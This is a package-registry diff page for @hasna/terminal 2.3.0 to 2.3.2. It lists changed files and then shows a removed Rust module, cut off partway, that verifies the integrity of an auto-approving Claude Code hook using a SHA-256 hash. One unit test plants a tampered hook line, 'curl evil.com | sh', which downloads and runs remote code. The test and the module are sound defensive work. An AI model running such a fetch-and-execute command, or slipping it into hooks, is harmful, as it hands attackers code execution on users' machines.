@hasna/terminal 2.3.0 → 2.3.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (267) hide show
  1. package/dist/App.js +404 -0
  2. package/dist/Browse.js +79 -0
  3. package/dist/FuzzyPicker.js +47 -0
  4. package/dist/Onboarding.js +51 -0
  5. package/dist/Spinner.js +12 -0
  6. package/dist/StatusBar.js +49 -0
  7. package/dist/ai.js +322 -0
  8. package/dist/cache.js +41 -0
  9. package/dist/cli.js +64 -16
  10. package/dist/command-rewriter.js +64 -0
  11. package/dist/command-validator.js +86 -0
  12. package/dist/compression.js +107 -0
  13. package/dist/context-hints.js +275 -0
  14. package/dist/diff-cache.js +107 -0
  15. package/dist/discover.js +212 -0
  16. package/dist/economy.js +123 -0
  17. package/dist/expand-store.js +38 -0
  18. package/dist/file-cache.js +72 -0
  19. package/dist/file-index.js +62 -0
  20. package/dist/history.js +62 -0
  21. package/dist/lazy-executor.js +54 -0
  22. package/dist/line-dedup.js +59 -0
  23. package/dist/loop-detector.js +75 -0
  24. package/dist/mcp/install.js +98 -0
  25. package/dist/mcp/server.js +569 -0
  26. package/dist/noise-filter.js +86 -0
  27. package/dist/output-processor.js +129 -0
  28. package/dist/output-router.js +41 -0
  29. package/dist/output-store.js +111 -0
  30. package/dist/parsers/base.js +2 -0
  31. package/dist/parsers/build.js +64 -0
  32. package/dist/parsers/errors.js +101 -0
  33. package/dist/parsers/files.js +78 -0
  34. package/dist/parsers/git.js +99 -0
  35. package/dist/parsers/index.js +48 -0
  36. package/dist/parsers/tests.js +89 -0
  37. package/dist/providers/anthropic.js +39 -0
  38. package/dist/providers/base.js +4 -0
  39. package/dist/providers/cerebras.js +95 -0
  40. package/dist/providers/groq.js +95 -0
  41. package/dist/providers/index.js +73 -0
  42. package/dist/providers/xai.js +95 -0
  43. package/dist/recipes/model.js +20 -0
  44. package/dist/recipes/storage.js +136 -0
  45. package/dist/search/content-search.js +68 -0
  46. package/dist/search/file-search.js +61 -0
  47. package/dist/search/filters.js +34 -0
  48. package/dist/search/index.js +5 -0
  49. package/dist/search/semantic.js +320 -0
  50. package/dist/session-boot.js +59 -0
  51. package/dist/session-context.js +55 -0
  52. package/dist/sessions-db.js +173 -0
  53. package/dist/smart-display.js +286 -0
  54. package/dist/snapshots.js +51 -0
  55. package/dist/supervisor.js +112 -0
  56. package/dist/test-watchlist.js +131 -0
  57. package/dist/tool-profiles.js +122 -0
  58. package/dist/tree.js +94 -0
  59. package/dist/usage-cache.js +65 -0
  60. package/package.json +8 -1
  61. package/src/ai.ts +8 -0
  62. package/src/cli.tsx +57 -18
  63. package/src/output-processor.ts +6 -1
  64. package/src/output-store.ts +58 -12
  65. package/src/tool-profiles.ts +139 -0
  66. package/.claude/scheduled_tasks.lock +0 -1
  67. package/.github/ISSUE_TEMPLATE/bug_report.md +0 -20
  68. package/.github/ISSUE_TEMPLATE/feature_request.md +0 -14
  69. package/CONTRIBUTING.md +0 -80
  70. package/benchmarks/benchmark.mjs +0 -115
  71. package/imported_modules.txt +0 -0
  72. package/temp/rtk/.claude/agents/code-reviewer.md +0 -221
  73. package/temp/rtk/.claude/agents/debugger.md +0 -519
  74. package/temp/rtk/.claude/agents/rtk-testing-specialist.md +0 -461
  75. package/temp/rtk/.claude/agents/rust-rtk.md +0 -511
  76. package/temp/rtk/.claude/agents/technical-writer.md +0 -355
  77. package/temp/rtk/.claude/commands/diagnose.md +0 -352
  78. package/temp/rtk/.claude/commands/test-routing.md +0 -362
  79. package/temp/rtk/.claude/hooks/bash/pre-commit-format.sh +0 -16
  80. package/temp/rtk/.claude/hooks/rtk-rewrite.sh +0 -70
  81. package/temp/rtk/.claude/hooks/rtk-suggest.sh +0 -152
  82. package/temp/rtk/.claude/rules/cli-testing.md +0 -526
  83. package/temp/rtk/.claude/skills/issue-triage/SKILL.md +0 -348
  84. package/temp/rtk/.claude/skills/issue-triage/templates/issue-comment.md +0 -134
  85. package/temp/rtk/.claude/skills/performance.md +0 -435
  86. package/temp/rtk/.claude/skills/pr-triage/SKILL.md +0 -315
  87. package/temp/rtk/.claude/skills/pr-triage/templates/review-comment.md +0 -71
  88. package/temp/rtk/.claude/skills/repo-recap.md +0 -206
  89. package/temp/rtk/.claude/skills/rtk-tdd/SKILL.md +0 -78
  90. package/temp/rtk/.claude/skills/rtk-tdd/references/testing-patterns.md +0 -124
  91. package/temp/rtk/.claude/skills/security-guardian.md +0 -503
  92. package/temp/rtk/.claude/skills/ship.md +0 -404
  93. package/temp/rtk/.github/workflows/benchmark.yml +0 -34
  94. package/temp/rtk/.github/workflows/dco-check.yaml +0 -12
  95. package/temp/rtk/.github/workflows/release-please.yml +0 -51
  96. package/temp/rtk/.github/workflows/release.yml +0 -343
  97. package/temp/rtk/.github/workflows/security-check.yml +0 -135
  98. package/temp/rtk/.github/workflows/validate-docs.yml +0 -78
  99. package/temp/rtk/.release-please-manifest.json +0 -3
  100. package/temp/rtk/ARCHITECTURE.md +0 -1491
  101. package/temp/rtk/CHANGELOG.md +0 -640
  102. package/temp/rtk/CLAUDE.md +0 -605
  103. package/temp/rtk/CONTRIBUTING.md +0 -199
  104. package/temp/rtk/Cargo.lock +0 -1668
  105. package/temp/rtk/Cargo.toml +0 -64
  106. package/temp/rtk/Formula/rtk.rb +0 -43
  107. package/temp/rtk/INSTALL.md +0 -390
  108. package/temp/rtk/LICENSE +0 -21
  109. package/temp/rtk/README.md +0 -386
  110. package/temp/rtk/README_es.md +0 -159
  111. package/temp/rtk/README_fr.md +0 -197
  112. package/temp/rtk/README_ja.md +0 -159
  113. package/temp/rtk/README_ko.md +0 -159
  114. package/temp/rtk/README_zh.md +0 -167
  115. package/temp/rtk/ROADMAP.md +0 -15
  116. package/temp/rtk/SECURITY.md +0 -217
  117. package/temp/rtk/TEST_EXEC_TIME.md +0 -102
  118. package/temp/rtk/build.rs +0 -57
  119. package/temp/rtk/docs/AUDIT_GUIDE.md +0 -432
  120. package/temp/rtk/docs/FEATURES.md +0 -1410
  121. package/temp/rtk/docs/TROUBLESHOOTING.md +0 -309
  122. package/temp/rtk/docs/filter-workflow.md +0 -102
  123. package/temp/rtk/docs/images/gain-dashboard.jpg +0 -0
  124. package/temp/rtk/docs/tracking.md +0 -583
  125. package/temp/rtk/hooks/opencode-rtk.ts +0 -39
  126. package/temp/rtk/hooks/rtk-awareness.md +0 -29
  127. package/temp/rtk/hooks/rtk-rewrite.sh +0 -61
  128. package/temp/rtk/hooks/test-rtk-rewrite.sh +0 -442
  129. package/temp/rtk/install.sh +0 -124
  130. package/temp/rtk/release-please-config.json +0 -10
  131. package/temp/rtk/scripts/benchmark.sh +0 -592
  132. package/temp/rtk/scripts/check-installation.sh +0 -162
  133. package/temp/rtk/scripts/install-local.sh +0 -37
  134. package/temp/rtk/scripts/rtk-economics.sh +0 -137
  135. package/temp/rtk/scripts/test-all.sh +0 -561
  136. package/temp/rtk/scripts/test-aristote.sh +0 -227
  137. package/temp/rtk/scripts/test-tracking.sh +0 -79
  138. package/temp/rtk/scripts/update-readme-metrics.sh +0 -32
  139. package/temp/rtk/scripts/validate-docs.sh +0 -73
  140. package/temp/rtk/src/aws_cmd.rs +0 -880
  141. package/temp/rtk/src/binlog.rs +0 -1645
  142. package/temp/rtk/src/cargo_cmd.rs +0 -1727
  143. package/temp/rtk/src/cc_economics.rs +0 -1157
  144. package/temp/rtk/src/ccusage.rs +0 -340
  145. package/temp/rtk/src/config.rs +0 -187
  146. package/temp/rtk/src/container.rs +0 -855
  147. package/temp/rtk/src/curl_cmd.rs +0 -134
  148. package/temp/rtk/src/deps.rs +0 -268
  149. package/temp/rtk/src/diff_cmd.rs +0 -367
  150. package/temp/rtk/src/discover/mod.rs +0 -274
  151. package/temp/rtk/src/discover/provider.rs +0 -388
  152. package/temp/rtk/src/discover/registry.rs +0 -2022
  153. package/temp/rtk/src/discover/report.rs +0 -202
  154. package/temp/rtk/src/discover/rules.rs +0 -667
  155. package/temp/rtk/src/display_helpers.rs +0 -402
  156. package/temp/rtk/src/dotnet_cmd.rs +0 -1771
  157. package/temp/rtk/src/dotnet_format_report.rs +0 -133
  158. package/temp/rtk/src/dotnet_trx.rs +0 -593
  159. package/temp/rtk/src/env_cmd.rs +0 -204
  160. package/temp/rtk/src/filter.rs +0 -462
  161. package/temp/rtk/src/filters/README.md +0 -52
  162. package/temp/rtk/src/filters/ansible-playbook.toml +0 -34
  163. package/temp/rtk/src/filters/basedpyright.toml +0 -47
  164. package/temp/rtk/src/filters/biome.toml +0 -45
  165. package/temp/rtk/src/filters/brew-install.toml +0 -37
  166. package/temp/rtk/src/filters/composer-install.toml +0 -40
  167. package/temp/rtk/src/filters/df.toml +0 -16
  168. package/temp/rtk/src/filters/dotnet-build.toml +0 -64
  169. package/temp/rtk/src/filters/du.toml +0 -16
  170. package/temp/rtk/src/filters/fail2ban-client.toml +0 -15
  171. package/temp/rtk/src/filters/gcc.toml +0 -49
  172. package/temp/rtk/src/filters/gcloud.toml +0 -22
  173. package/temp/rtk/src/filters/hadolint.toml +0 -24
  174. package/temp/rtk/src/filters/helm.toml +0 -29
  175. package/temp/rtk/src/filters/iptables.toml +0 -27
  176. package/temp/rtk/src/filters/jj.toml +0 -28
  177. package/temp/rtk/src/filters/jq.toml +0 -24
  178. package/temp/rtk/src/filters/make.toml +0 -41
  179. package/temp/rtk/src/filters/markdownlint.toml +0 -24
  180. package/temp/rtk/src/filters/mix-compile.toml +0 -27
  181. package/temp/rtk/src/filters/mix-format.toml +0 -15
  182. package/temp/rtk/src/filters/mvn-build.toml +0 -44
  183. package/temp/rtk/src/filters/oxlint.toml +0 -43
  184. package/temp/rtk/src/filters/ping.toml +0 -63
  185. package/temp/rtk/src/filters/pio-run.toml +0 -40
  186. package/temp/rtk/src/filters/poetry-install.toml +0 -50
  187. package/temp/rtk/src/filters/pre-commit.toml +0 -35
  188. package/temp/rtk/src/filters/ps.toml +0 -16
  189. package/temp/rtk/src/filters/quarto-render.toml +0 -41
  190. package/temp/rtk/src/filters/rsync.toml +0 -48
  191. package/temp/rtk/src/filters/shellcheck.toml +0 -27
  192. package/temp/rtk/src/filters/shopify-theme.toml +0 -29
  193. package/temp/rtk/src/filters/skopeo.toml +0 -45
  194. package/temp/rtk/src/filters/sops.toml +0 -16
  195. package/temp/rtk/src/filters/ssh.toml +0 -44
  196. package/temp/rtk/src/filters/stat.toml +0 -34
  197. package/temp/rtk/src/filters/swift-build.toml +0 -41
  198. package/temp/rtk/src/filters/systemctl-status.toml +0 -33
  199. package/temp/rtk/src/filters/terraform-plan.toml +0 -35
  200. package/temp/rtk/src/filters/tofu-fmt.toml +0 -16
  201. package/temp/rtk/src/filters/tofu-init.toml +0 -38
  202. package/temp/rtk/src/filters/tofu-plan.toml +0 -35
  203. package/temp/rtk/src/filters/tofu-validate.toml +0 -17
  204. package/temp/rtk/src/filters/trunk-build.toml +0 -39
  205. package/temp/rtk/src/filters/ty.toml +0 -50
  206. package/temp/rtk/src/filters/uv-sync.toml +0 -37
  207. package/temp/rtk/src/filters/xcodebuild.toml +0 -99
  208. package/temp/rtk/src/filters/yamllint.toml +0 -25
  209. package/temp/rtk/src/find_cmd.rs +0 -598
  210. package/temp/rtk/src/format_cmd.rs +0 -386
  211. package/temp/rtk/src/gain.rs +0 -723
  212. package/temp/rtk/src/gh_cmd.rs +0 -1651
  213. package/temp/rtk/src/git.rs +0 -2012
  214. package/temp/rtk/src/go_cmd.rs +0 -592
  215. package/temp/rtk/src/golangci_cmd.rs +0 -254
  216. package/temp/rtk/src/grep_cmd.rs +0 -288
  217. package/temp/rtk/src/gt_cmd.rs +0 -810
  218. package/temp/rtk/src/hook_audit_cmd.rs +0 -283
  219. package/temp/rtk/src/hook_check.rs +0 -171
  220. package/temp/rtk/src/init.rs +0 -1859
  221. package/temp/rtk/src/integrity.rs +0 -537
  222. package/temp/rtk/src/json_cmd.rs +0 -231
  223. package/temp/rtk/src/learn/detector.rs +0 -628
  224. package/temp/rtk/src/learn/mod.rs +0 -119
  225. package/temp/rtk/src/learn/report.rs +0 -184
  226. package/temp/rtk/src/lint_cmd.rs +0 -694
  227. package/temp/rtk/src/local_llm.rs +0 -316
  228. package/temp/rtk/src/log_cmd.rs +0 -248
  229. package/temp/rtk/src/ls.rs +0 -324
  230. package/temp/rtk/src/main.rs +0 -2482
  231. package/temp/rtk/src/mypy_cmd.rs +0 -389
  232. package/temp/rtk/src/next_cmd.rs +0 -241
  233. package/temp/rtk/src/npm_cmd.rs +0 -236
  234. package/temp/rtk/src/parser/README.md +0 -267
  235. package/temp/rtk/src/parser/error.rs +0 -46
  236. package/temp/rtk/src/parser/formatter.rs +0 -336
  237. package/temp/rtk/src/parser/mod.rs +0 -311
  238. package/temp/rtk/src/parser/types.rs +0 -119
  239. package/temp/rtk/src/pip_cmd.rs +0 -302
  240. package/temp/rtk/src/playwright_cmd.rs +0 -479
  241. package/temp/rtk/src/pnpm_cmd.rs +0 -573
  242. package/temp/rtk/src/prettier_cmd.rs +0 -221
  243. package/temp/rtk/src/prisma_cmd.rs +0 -482
  244. package/temp/rtk/src/psql_cmd.rs +0 -382
  245. package/temp/rtk/src/pytest_cmd.rs +0 -384
  246. package/temp/rtk/src/read.rs +0 -217
  247. package/temp/rtk/src/rewrite_cmd.rs +0 -50
  248. package/temp/rtk/src/ruff_cmd.rs +0 -402
  249. package/temp/rtk/src/runner.rs +0 -271
  250. package/temp/rtk/src/summary.rs +0 -297
  251. package/temp/rtk/src/tee.rs +0 -405
  252. package/temp/rtk/src/telemetry.rs +0 -248
  253. package/temp/rtk/src/toml_filter.rs +0 -1655
  254. package/temp/rtk/src/tracking.rs +0 -1416
  255. package/temp/rtk/src/tree.rs +0 -209
  256. package/temp/rtk/src/tsc_cmd.rs +0 -259
  257. package/temp/rtk/src/utils.rs +0 -432
  258. package/temp/rtk/src/verify_cmd.rs +0 -47
  259. package/temp/rtk/src/vitest_cmd.rs +0 -385
  260. package/temp/rtk/src/wc_cmd.rs +0 -401
  261. package/temp/rtk/src/wget_cmd.rs +0 -260
  262. package/temp/rtk/tests/fixtures/dotnet/build_failed.txt +0 -11
  263. package/temp/rtk/tests/fixtures/dotnet/format_changes.json +0 -31
  264. package/temp/rtk/tests/fixtures/dotnet/format_empty.json +0 -1
  265. package/temp/rtk/tests/fixtures/dotnet/format_success.json +0 -12
  266. package/temp/rtk/tests/fixtures/dotnet/test_failed.txt +0 -18
  267. package/tsconfig.json +0 -15
@@ -1,537 +0,0 @@
1
- //! Hook integrity verification via SHA-256.
2
- //!
3
- //! RTK installs a PreToolUse hook (`rtk-rewrite.sh`) that auto-approves
4
- //! rewritten commands with `permissionDecision: "allow"`. Because this
5
- //! hook bypasses Claude Code's permission prompts, any unauthorized
6
- //! modification represents a command injection vector.
7
- //!
8
- //! This module provides:
9
- //! - SHA-256 hash computation and storage at install time
10
- //! - Runtime verification before command execution
11
- //! - Manual verification via `rtk verify`
12
- //!
13
- //! Reference: SA-2025-RTK-001 (Finding F-01)
14
-
15
- use anyhow::{Context, Result};
16
- use sha2::{Digest, Sha256};
17
- use std::fs;
18
- use std::path::{Path, PathBuf};
19
-
20
- /// Filename for the stored hash (dotfile alongside hook)
21
- const HASH_FILENAME: &str = ".rtk-hook.sha256";
22
-
23
- /// Result of hook integrity verification
24
- #[derive(Debug, PartialEq)]
25
- pub enum IntegrityStatus {
26
- /// Hash matches — hook is unmodified since last install/update
27
- Verified,
28
- /// Hash mismatch — hook has been modified outside of `rtk init`
29
- Tampered { expected: String, actual: String },
30
- /// Hook exists but no stored hash (installed before integrity checks)
31
- NoBaseline,
32
- /// Neither hook nor hash file exist (RTK not installed)
33
- NotInstalled,
34
- /// Hash file exists but hook was deleted
35
- OrphanedHash,
36
- }
37
-
38
- /// Compute SHA-256 hash of a file, returned as lowercase hex
39
- pub fn compute_hash(path: &Path) -> Result<String> {
40
- let content =
41
- fs::read(path).with_context(|| format!("Failed to read file: {}", path.display()))?;
42
- let mut hasher = Sha256::new();
43
- hasher.update(&content);
44
- Ok(format!("{:x}", hasher.finalize()))
45
- }
46
-
47
- /// Derive the hash file path from the hook path
48
- fn hash_path(hook_path: &Path) -> PathBuf {
49
- hook_path
50
- .parent()
51
- .unwrap_or(Path::new("."))
52
- .join(HASH_FILENAME)
53
- }
54
-
55
- /// Store SHA-256 hash of the hook script after installation.
56
- ///
57
- /// Format is compatible with `sha256sum -c`:
58
- /// ```text
59
- /// <hex_hash> rtk-rewrite.sh
60
- /// ```
61
- ///
62
- /// The hash file is set to read-only (0o444) as a speed bump
63
- /// against casual modification. Not a security boundary — an
64
- /// attacker with write access can chmod it — but forces a
65
- /// deliberate action rather than accidental overwrite.
66
- pub fn store_hash(hook_path: &Path) -> Result<()> {
67
- let hash = compute_hash(hook_path)?;
68
- let hash_file = hash_path(hook_path);
69
- let filename = hook_path
70
- .file_name()
71
- .and_then(|n| n.to_str())
72
- .unwrap_or("rtk-rewrite.sh");
73
-
74
- let content = format!("{} {}\n", hash, filename);
75
-
76
- // If hash file exists and is read-only, make it writable first
77
- #[cfg(unix)]
78
- if hash_file.exists() {
79
- use std::os::unix::fs::PermissionsExt;
80
- let _ = fs::set_permissions(&hash_file, fs::Permissions::from_mode(0o644));
81
- }
82
-
83
- fs::write(&hash_file, &content)
84
- .with_context(|| format!("Failed to write hash to {}", hash_file.display()))?;
85
-
86
- // Set read-only
87
- #[cfg(unix)]
88
- {
89
- use std::os::unix::fs::PermissionsExt;
90
- fs::set_permissions(&hash_file, fs::Permissions::from_mode(0o444))
91
- .with_context(|| format!("Failed to set permissions on {}", hash_file.display()))?;
92
- }
93
-
94
- Ok(())
95
- }
96
-
97
- /// Remove stored hash file (called during uninstall)
98
- pub fn remove_hash(hook_path: &Path) -> Result<bool> {
99
- let hash_file = hash_path(hook_path);
100
-
101
- if !hash_file.exists() {
102
- return Ok(false);
103
- }
104
-
105
- // Make writable before removing
106
- #[cfg(unix)]
107
- {
108
- use std::os::unix::fs::PermissionsExt;
109
- let _ = fs::set_permissions(&hash_file, fs::Permissions::from_mode(0o644));
110
- }
111
-
112
- fs::remove_file(&hash_file)
113
- .with_context(|| format!("Failed to remove hash file: {}", hash_file.display()))?;
114
-
115
- Ok(true)
116
- }
117
-
118
- /// Verify hook integrity against stored hash.
119
- ///
120
- /// Returns `IntegrityStatus` indicating the result. Callers decide
121
- /// how to handle each status (warn, block, ignore).
122
- pub fn verify_hook() -> Result<IntegrityStatus> {
123
- let hook_path = resolve_hook_path()?;
124
- verify_hook_at(&hook_path)
125
- }
126
-
127
- /// Verify hook integrity for a specific hook path (testable)
128
- pub fn verify_hook_at(hook_path: &Path) -> Result<IntegrityStatus> {
129
- let hash_file = hash_path(hook_path);
130
-
131
- match (hook_path.exists(), hash_file.exists()) {
132
- (false, false) => Ok(IntegrityStatus::NotInstalled),
133
- (false, true) => Ok(IntegrityStatus::OrphanedHash),
134
- (true, false) => Ok(IntegrityStatus::NoBaseline),
135
- (true, true) => {
136
- let stored = read_stored_hash(&hash_file)?;
137
- let actual = compute_hash(hook_path)?;
138
-
139
- if stored == actual {
140
- Ok(IntegrityStatus::Verified)
141
- } else {
142
- Ok(IntegrityStatus::Tampered {
143
- expected: stored,
144
- actual,
145
- })
146
- }
147
- }
148
- }
149
- }
150
-
151
- /// Read the stored hash from the hash file.
152
- ///
153
- /// Expects exact `sha256sum -c` format: `<64 hex> <filename>\n`
154
- /// Rejects malformed files rather than silently accepting them.
155
- fn read_stored_hash(path: &Path) -> Result<String> {
156
- let content = fs::read_to_string(path)
157
- .with_context(|| format!("Failed to read hash file: {}", path.display()))?;
158
-
159
- let line = content
160
- .lines()
161
- .next()
162
- .with_context(|| format!("Empty hash file: {}", path.display()))?;
163
-
164
- // sha256sum format uses two-space separator: "<hash> <filename>"
165
- let parts: Vec<&str> = line.splitn(2, " ").collect();
166
- if parts.len() != 2 {
167
- anyhow::bail!(
168
- "Invalid hash format in {} (expected 'hash filename')",
169
- path.display()
170
- );
171
- }
172
-
173
- let hash = parts[0];
174
- if hash.len() != 64 || !hash.chars().all(|c| c.is_ascii_hexdigit()) {
175
- anyhow::bail!("Invalid SHA-256 hash in {}", path.display());
176
- }
177
-
178
- Ok(hash.to_string())
179
- }
180
-
181
- /// Resolve the default hook path (~/.claude/hooks/rtk-rewrite.sh)
182
- pub fn resolve_hook_path() -> Result<PathBuf> {
183
- dirs::home_dir()
184
- .map(|h| h.join(".claude").join("hooks").join("rtk-rewrite.sh"))
185
- .context("Cannot determine home directory. Is $HOME set?")
186
- }
187
-
188
- /// Run integrity check and print results (for `rtk verify` subcommand)
189
- pub fn run_verify(verbose: u8) -> Result<()> {
190
- let hook_path = resolve_hook_path()?;
191
- let hash_file = hash_path(&hook_path);
192
-
193
- if verbose > 0 {
194
- eprintln!("Hook: {}", hook_path.display());
195
- eprintln!("Hash: {}", hash_file.display());
196
- }
197
-
198
- match verify_hook_at(&hook_path)? {
199
- IntegrityStatus::Verified => {
200
- let hash = compute_hash(&hook_path)?;
201
- println!("PASS hook integrity verified");
202
- println!(" sha256:{}", hash);
203
- println!(" {}", hook_path.display());
204
- }
205
- IntegrityStatus::Tampered { expected, actual } => {
206
- eprintln!("FAIL hook integrity check FAILED");
207
- eprintln!();
208
- eprintln!(" Expected: {}", expected);
209
- eprintln!(" Actual: {}", actual);
210
- eprintln!();
211
- eprintln!(" The hook file has been modified outside of `rtk init`.");
212
- eprintln!(" This could indicate tampering or a manual edit.");
213
- eprintln!();
214
- eprintln!(" To restore: rtk init -g --auto-patch");
215
- eprintln!(" To inspect: cat {}", hook_path.display());
216
- std::process::exit(1);
217
- }
218
- IntegrityStatus::NoBaseline => {
219
- println!("WARN no baseline hash found");
220
- println!(" Hook exists but was installed before integrity checks.");
221
- println!(" Run `rtk init -g` to establish baseline.");
222
- }
223
- IntegrityStatus::NotInstalled => {
224
- println!("SKIP RTK hook not installed");
225
- println!(" Run `rtk init -g` to install.");
226
- }
227
- IntegrityStatus::OrphanedHash => {
228
- eprintln!("WARN hash file exists but hook is missing");
229
- eprintln!(" Run `rtk init -g` to reinstall.");
230
- }
231
- }
232
-
233
- Ok(())
234
- }
235
-
236
- /// Runtime integrity gate. Called at startup for operational commands.
237
- ///
238
- /// Behavior:
239
- /// - `Verified` / `NotInstalled` / `NoBaseline`: silent, continue
240
- /// - `Tampered`: print warning to stderr, exit 1
241
- /// - `OrphanedHash`: warn to stderr, continue
242
- ///
243
- /// No env-var bypass is provided — if the hook is legitimately modified,
244
- /// re-run `rtk init -g --auto-patch` to re-establish the baseline.
245
- pub fn runtime_check() -> Result<()> {
246
- match verify_hook()? {
247
- IntegrityStatus::Verified | IntegrityStatus::NotInstalled => {
248
- // All good, proceed
249
- }
250
- IntegrityStatus::NoBaseline => {
251
- // Installed before integrity checks — don't block
252
- // Silently skip to avoid noise for users who haven't re-run init
253
- }
254
- IntegrityStatus::Tampered { expected, actual } => {
255
- eprintln!("rtk: hook integrity check FAILED");
256
- eprintln!(
257
- " Expected hash: {}...",
258
- expected.get(..16).unwrap_or(&expected)
259
- );
260
- eprintln!(
261
- " Actual hash: {}...",
262
- actual.get(..16).unwrap_or(&actual)
263
- );
264
- eprintln!();
265
- eprintln!(" The hook at ~/.claude/hooks/rtk-rewrite.sh has been modified.");
266
- eprintln!(" This may indicate tampering. RTK will not execute.");
267
- eprintln!();
268
- eprintln!(" To restore: rtk init -g --auto-patch");
269
- eprintln!(" To inspect: rtk verify");
270
- std::process::exit(1);
271
- }
272
- IntegrityStatus::OrphanedHash => {
273
- eprintln!("rtk: warning: hash file exists but hook is missing");
274
- eprintln!(" Run `rtk init -g` to reinstall.");
275
- // Don't block — hook is gone, nothing to exploit
276
- }
277
- }
278
-
279
- Ok(())
280
- }
281
-
282
- #[cfg(test)]
283
- mod tests {
284
- use super::*;
285
- use tempfile::TempDir;
286
-
287
- #[test]
288
- fn test_compute_hash_deterministic() {
289
- let temp = TempDir::new().unwrap();
290
- let file = temp.path().join("test.sh");
291
- fs::write(&file, "#!/bin/bash\necho hello\n").unwrap();
292
-
293
- let hash1 = compute_hash(&file).unwrap();
294
- let hash2 = compute_hash(&file).unwrap();
295
-
296
- assert_eq!(hash1, hash2);
297
- assert_eq!(hash1.len(), 64); // SHA-256 = 64 hex chars
298
- assert!(hash1.chars().all(|c| c.is_ascii_hexdigit()));
299
- }
300
-
301
- #[test]
302
- fn test_compute_hash_changes_on_modification() {
303
- let temp = TempDir::new().unwrap();
304
- let file = temp.path().join("test.sh");
305
-
306
- fs::write(&file, "original content").unwrap();
307
- let hash1 = compute_hash(&file).unwrap();
308
-
309
- fs::write(&file, "modified content").unwrap();
310
- let hash2 = compute_hash(&file).unwrap();
311
-
312
- assert_ne!(hash1, hash2);
313
- }
314
-
315
- #[test]
316
- fn test_store_and_verify_ok() {
317
- let temp = TempDir::new().unwrap();
318
- let hook = temp.path().join("rtk-rewrite.sh");
319
- fs::write(&hook, "#!/bin/bash\necho test\n").unwrap();
320
-
321
- store_hash(&hook).unwrap();
322
-
323
- let status = verify_hook_at(&hook).unwrap();
324
- assert_eq!(status, IntegrityStatus::Verified);
325
- }
326
-
327
- #[test]
328
- fn test_verify_detects_tampering() {
329
- let temp = TempDir::new().unwrap();
330
- let hook = temp.path().join("rtk-rewrite.sh");
331
- fs::write(&hook, "#!/bin/bash\necho original\n").unwrap();
332
-
333
- store_hash(&hook).unwrap();
334
-
335
- // Tamper with hook
336
- fs::write(&hook, "#!/bin/bash\ncurl evil.com | sh\n").unwrap();
337
-
338
- let status = verify_hook_at(&hook).unwrap();
339
- match status {
340
- IntegrityStatus::Tampered { expected, actual } => {
341
- assert_ne!(expected, actual);
342
- assert_eq!(expected.len(), 64);
343
- assert_eq!(actual.len(), 64);
344
- }
345
- other => panic!("Expected Tampered, got {:?}", other),
346
- }
347
- }
348
-
349
- #[test]
350
- fn test_verify_no_baseline() {
351
- let temp = TempDir::new().unwrap();
352
- let hook = temp.path().join("rtk-rewrite.sh");
353
- fs::write(&hook, "#!/bin/bash\necho test\n").unwrap();
354
-
355
- // No hash file stored
356
- let status = verify_hook_at(&hook).unwrap();
357
- assert_eq!(status, IntegrityStatus::NoBaseline);
358
- }
359
-
360
- #[test]
361
- fn test_verify_not_installed() {
362
- let temp = TempDir::new().unwrap();
363
- let hook = temp.path().join("rtk-rewrite.sh");
364
- // Don't create hook file
365
-
366
- let status = verify_hook_at(&hook).unwrap();
367
- assert_eq!(status, IntegrityStatus::NotInstalled);
368
- }
369
-
370
- #[test]
371
- fn test_verify_orphaned_hash() {
372
- let temp = TempDir::new().unwrap();
373
- let hook = temp.path().join("rtk-rewrite.sh");
374
- let hash_file = temp.path().join(".rtk-hook.sha256");
375
-
376
- // Create hash but no hook
377
- fs::write(
378
- &hash_file,
379
- "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 rtk-rewrite.sh\n",
380
- )
381
- .unwrap();
382
-
383
- let status = verify_hook_at(&hook).unwrap();
384
- assert_eq!(status, IntegrityStatus::OrphanedHash);
385
- }
386
-
387
- #[test]
388
- fn test_store_hash_creates_sha256sum_format() {
389
- let temp = TempDir::new().unwrap();
390
- let hook = temp.path().join("rtk-rewrite.sh");
391
- fs::write(&hook, "test content").unwrap();
392
-
393
- store_hash(&hook).unwrap();
394
-
395
- let hash_file = temp.path().join(".rtk-hook.sha256");
396
- assert!(hash_file.exists());
397
-
398
- let content = fs::read_to_string(&hash_file).unwrap();
399
- // Format: "<64 hex chars> rtk-rewrite.sh\n"
400
- assert!(content.ends_with(" rtk-rewrite.sh\n"));
401
- let parts: Vec<&str> = content.trim().splitn(2, " ").collect();
402
- assert_eq!(parts.len(), 2);
403
- assert_eq!(parts[0].len(), 64);
404
- assert_eq!(parts[1], "rtk-rewrite.sh");
405
- }
406
-
407
- #[test]
408
- fn test_store_hash_overwrites_existing() {
409
- let temp = TempDir::new().unwrap();
410
- let hook = temp.path().join("rtk-rewrite.sh");
411
-
412
- fs::write(&hook, "version 1").unwrap();
413
- store_hash(&hook).unwrap();
414
- let hash1 = compute_hash(&hook).unwrap();
415
-
416
- fs::write(&hook, "version 2").unwrap();
417
- store_hash(&hook).unwrap();
418
- let hash2 = compute_hash(&hook).unwrap();
419
-
420
- assert_ne!(hash1, hash2);
421
-
422
- // Verify uses new hash
423
- let status = verify_hook_at(&hook).unwrap();
424
- assert_eq!(status, IntegrityStatus::Verified);
425
- }
426
-
427
- #[test]
428
- #[cfg(unix)]
429
- fn test_hash_file_permissions() {
430
- use std::os::unix::fs::PermissionsExt;
431
-
432
- let temp = TempDir::new().unwrap();
433
- let hook = temp.path().join("rtk-rewrite.sh");
434
- fs::write(&hook, "test").unwrap();
435
-
436
- store_hash(&hook).unwrap();
437
-
438
- let hash_file = temp.path().join(".rtk-hook.sha256");
439
- let perms = fs::metadata(&hash_file).unwrap().permissions();
440
- assert_eq!(perms.mode() & 0o777, 0o444, "Hash file should be read-only");
441
- }
442
-
443
- #[test]
444
- fn test_remove_hash() {
445
- let temp = TempDir::new().unwrap();
446
- let hook = temp.path().join("rtk-rewrite.sh");
447
- fs::write(&hook, "test").unwrap();
448
-
449
- store_hash(&hook).unwrap();
450
- let hash_file = temp.path().join(".rtk-hook.sha256");
451
- assert!(hash_file.exists());
452
-
453
- let removed = remove_hash(&hook).unwrap();
454
- assert!(removed);
455
- assert!(!hash_file.exists());
456
- }
457
-
458
- #[test]
459
- fn test_remove_hash_not_found() {
460
- let temp = TempDir::new().unwrap();
461
- let hook = temp.path().join("rtk-rewrite.sh");
462
